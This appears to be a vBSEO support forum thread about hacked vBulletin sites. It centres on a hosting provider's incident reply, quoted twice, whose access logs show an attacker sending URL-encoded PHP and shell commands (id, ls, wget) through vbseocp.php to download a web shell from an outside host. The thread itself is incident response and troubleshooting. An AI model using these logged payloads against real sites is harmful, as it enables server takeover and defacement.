FAQ's on the Rogue Plugins Exploit (1/23 vBSEO Patch Release)

file2store.info redirect is not a vBSEO issue. Disabling/Enabling , reimporting product file only refreshes datastore which refreshes datastore.
Forums that don't run vBSEO are also facing similar issues. You may want to examine following threads


You basically need to protect all folders on your site that has chmod 777 values


http://www.vbseo.com/f77/google-redi...tml#post315178
https://www.vbulletin.com/forum/show...=1#post2198971

I have reported this issue to my host, here is what they replied back with-please let me know if this makes any sense or if i am on the right track.


Hello,

We have found additional web shells running on your account. We noticed these were used to add malicious content to your account.

For security purposes, the cPanel password for ********* has been reset to ***********

We have taken action to remove these scripts.

/*****/*****/*****/vbseo_sitemap/vbseo_logs.php
/*****/*****/******/network.php

The older of these shells has a time stamp that coordinates with log files showing upload through another script which was removed from the account.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
File: /****/*****/*****/network.php
Modify: Sun, 21 Mar 2010 17:11:43 -0500 (1269209503)
Change: Mon, 02 Apr 2012 01:50:11 -0500 (1333349411)

/******/*****/logs/*******.com-Apr-2012.gz: 67.18.77.116 - - [02/Apr/2012:01:50:11 -0500] "POST /cron______.php HTTP/1.1" 200 6731 "http://www.********.com/cron______.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.28) Gecko/20120306 Firefox/3.6.28 ( .NET CLR 3.5.30729; .NET4.0C)"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

I traced the log files back through the server using this IP to see that the vbseocp.php script was the source of the compromise.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
67.18.77.116 - - [02/Apr/2012:01:43:10 -0500] "POST /vbseocp.php HTTP/1.1" 200 134173 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.28) Gecko/20120306 Firefox/3.6.28 ( .NET CLR 3.5.30729; .NET4.0C)"
67.18.77.116 - - [02/Apr/2012:01:46:47 -0500] "POST /vbseocp.php?p=$ch%20=%20curl_init($_REQUEST[rShell]);$fp%20=%20fopen($_REQUEST[lShell],%20$_REQUEST[mode]);curl_setopt($ch,%20CURLOPT_FILE,%20$fp);curl_set opt($ch,%20CURLOPT_HEADER,%
200);curl_exec($ch);curl_close($ch);fclose($fp);&m ode=w&rShell=http://dl.com.my/s.txt&lShell=cron___.php HTTP/1.1" 403 933 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.28) Gecko/20120306 Firefox/3.6.28 ( .NET CLR 3.5.3
0729; .NET4.0C)"
67.18.77.116 - - [02/Apr/2012:01:46:56 -0500] "POST /vbseocp.php?p=$ch%20=%20curl_init($_REQUEST[rShell]);$fp%20=%20fopen($_REQUEST[lShell],%20$_REQUEST[mode]);curl_setopt($ch,%20CURLOPT_FILE,%20$fp);curl_set opt($ch,%20CURLOPT_HEADER,%
200);curl_exec($ch);curl_close($ch);fclose($fp);&m ode=w&rShell=http://dl.com.my/s.txt&lShell=cron___.php HTTP/1.1" 403 933 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.28) Gecko/20120306 Firefox/3.6.28 ( .NET CLR 3.5.3
0729; .NET4.0C)"
67.18.77.116 - - [02/Apr/2012:01:47:38 -0500] "POST /vbseocp.php?d=id HTTP/1.1" 200 1313 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.28) Gecko/20120306 Firefox/3.6.28 ( .NET CLR 3.5.30729; .NET4.0C)"
67.18.77.116 - - [02/Apr/2012:01:47:51 -0500] "POST /vbseocp.php?d=ls%20-al HTTP/1.1" 200 31387 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.28) Gecko/20120306 Firefox/3.6.28 ( .NET CLR 3.5.30729; .NET4.0C)"
67.18.77.116 - - [02/Apr/2012:01:48:39 -0500] "POST /vbseocp.php?d=wget%20dl.com.my/s.txt%20-O%20cron______.php HTTP/1.1" 200 913 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.28) Gecko/20120306 Firefox/3.6.28 ( .NET CL
R 3.5.30729; .NET4.0C)"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Originally Posted by tommydamic68

I have reported this issue to my host, here is what they replied back with-please let me know if this makes any sense or if i am on the right track.


Hello,

We have found additional web shells running on your account. We noticed these were used to add malicious content to your account.

For security purposes, the cPanel password for ********* has been reset to ***********

We have taken action to remove these scripts.

/*****/*****/*****/vbseo_sitemap/vbseo_logs.php
/*****/*****/******/network.php

The older of these shells has a time stamp that coordinates with log files showing upload through another script which was removed from the account.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
File: /****/*****/*****/network.php
Modify: Sun, 21 Mar 2010 17:11:43 -0500 (1269209503)
Change: Mon, 02 Apr 2012 01:50:11 -0500 (1333349411)

/******/*****/logs/*******.com-Apr-2012.gz: 67.18.77.116 - - [02/Apr/2012:01:50:11 -0500] "POST /cron______.php HTTP/1.1" 200 6731 "http://www.********.com/cron______.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.28) Gecko/20120306 Firefox/3.6.28 ( .NET CLR 3.5.30729; .NET4.0C)"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

I traced the log files back through the server using this IP to see that the vbseocp.php script was the source of the compromise.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
67.18.77.116 - - [02/Apr/2012:01:43:10 -0500] "POST /vbseocp.php HTTP/1.1" 200 134173 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.28) Gecko/20120306 Firefox/3.6.28 ( .NET CLR 3.5.30729; .NET4.0C)"
67.18.77.116 - - [02/Apr/2012:01:46:47 -0500] "POST /vbseocp.php?p=$ch%20=%20curl_init($_REQUEST[rShell]);$fp%20=%20fopen($_REQUEST[lShell],%20$_REQUEST[mode]);curl_setopt($ch,%20CURLOPT_FILE,%20$fp);curl_set opt($ch,%20CURLOPT_HEADER,%
200);curl_exec($ch);curl_close($ch);fclose($fp);&m ode=w&rShell=http://dl.com.my/s.txt&lShell=cron___.php HTTP/1.1" 403 933 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.28) Gecko/20120306 Firefox/3.6.28 ( .NET CLR 3.5.3
0729; .NET4.0C)"
67.18.77.116 - - [02/Apr/2012:01:46:56 -0500] "POST /vbseocp.php?p=$ch%20=%20curl_init($_REQUEST[rShell]);$fp%20=%20fopen($_REQUEST[lShell],%20$_REQUEST[mode]);curl_setopt($ch,%20CURLOPT_FILE,%20$fp);curl_set opt($ch,%20CURLOPT_HEADER,%
200);curl_exec($ch);curl_close($ch);fclose($fp);&m ode=w&rShell=http://dl.com.my/s.txt&lShell=cron___.php HTTP/1.1" 403 933 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.28) Gecko/20120306 Firefox/3.6.28 ( .NET CLR 3.5.3
0729; .NET4.0C)"
67.18.77.116 - - [02/Apr/2012:01:47:38 -0500] "POST /vbseocp.php?d=id HTTP/1.1" 200 1313 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.28) Gecko/20120306 Firefox/3.6.28 ( .NET CLR 3.5.30729; .NET4.0C)"
67.18.77.116 - - [02/Apr/2012:01:47:51 -0500] "POST /vbseocp.php?d=ls%20-al HTTP/1.1" 200 31387 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.28) Gecko/20120306 Firefox/3.6.28 ( .NET CLR 3.5.30729; .NET4.0C)"
67.18.77.116 - - [02/Apr/2012:01:48:39 -0500] "POST /vbseocp.php?d=wget%20dl.com.my/s.txt%20-O%20cron______.php HTTP/1.1" 200 913 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.28) Gecko/20120306 Firefox/3.6.28 ( .NET CL
R 3.5.30729; .NET4.0C)"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Please don't flood all around with your messages. Try sticking on one thread so you can receive further assistance.

This is happening again to me.

See Google Sent 20,000+ Hacked Notification Messages To Webmasters Today.

I received the hacked message yesterday and my site then had the malware message plastered onto it, personally I think its a bloody cheek that Google has the right to block your site and display a 'compromised / malware warning' because as soon as they do that it doesnt matter which other search engine you then use you still get bad messages and all your traffic dissapears overnight. There should definately be a grace period of at least a few hours to get things sorted.

I'm lucky that I am competent enough to remove the code and malicious scripts and got myself reconsidered on Google within 10 hours... however I am still not convinced that everthing is hunky dory in the vbseo world and aprehensive at reactivating the vbseo software - I have upgraded to 4.2 on vbulletin and uploaded all the new files for vbseo but not turned the plugin back on yet, I have run the checks suggested at the start of this thread - AM I SAFE TO SWITCH IT BACK ON DO YOU THINK??

We keep seeing this daily. Is it normal?

Checking datastore pluginslist: DETECTED: eval(CHR [Click here to reset datastore]

Originally Posted by stevectaylor

We keep seeing this daily. Is it normal?

No - this is not normal. There is an active security leak in the latest VBSEO Plugin - we found out how the code is inserted. But Crawlability doesn´t seem to be interested in a solution. They don´t care about it for 5 month !

TopAs but you didn't contact with Andrés yesterday with a posible solution?

Well I am lost in all this. Going to remove VBSEO on one of our and see if that resolves it.

Hi Steven,

Upon detailed investigations performed by our development team, we've found out that "register_globals" PHP directive seems to be the most common cause of the issue.

Please see for details: http://www.vbseo.com/f3/hacked-url12...tml#post332787

Can you give it a try prior removing vBSEO?

done. Lets see. I will let you know.

Originally Posted by Andrés Durán Hewitt

Hi Steven, Upon detailed investigations performed by our development team, we've found out that "register_globals" PHP directive seems to be the most common cause of the issue. Please see for details: http://www.vbseo.com/f3/hacked-url12...tml#post332787 Can you give it a try prior removing vBSEO?

Is this done through the host, or can we do this on our end?

Originally Posted by toejam

Is this done through the host, or can we do this on our end?

We changed it through CPanel in the PHPini option. I am sure you maybe able to use an .ini file

I am not sure were to look in cpanel to do this. This wont effect anything?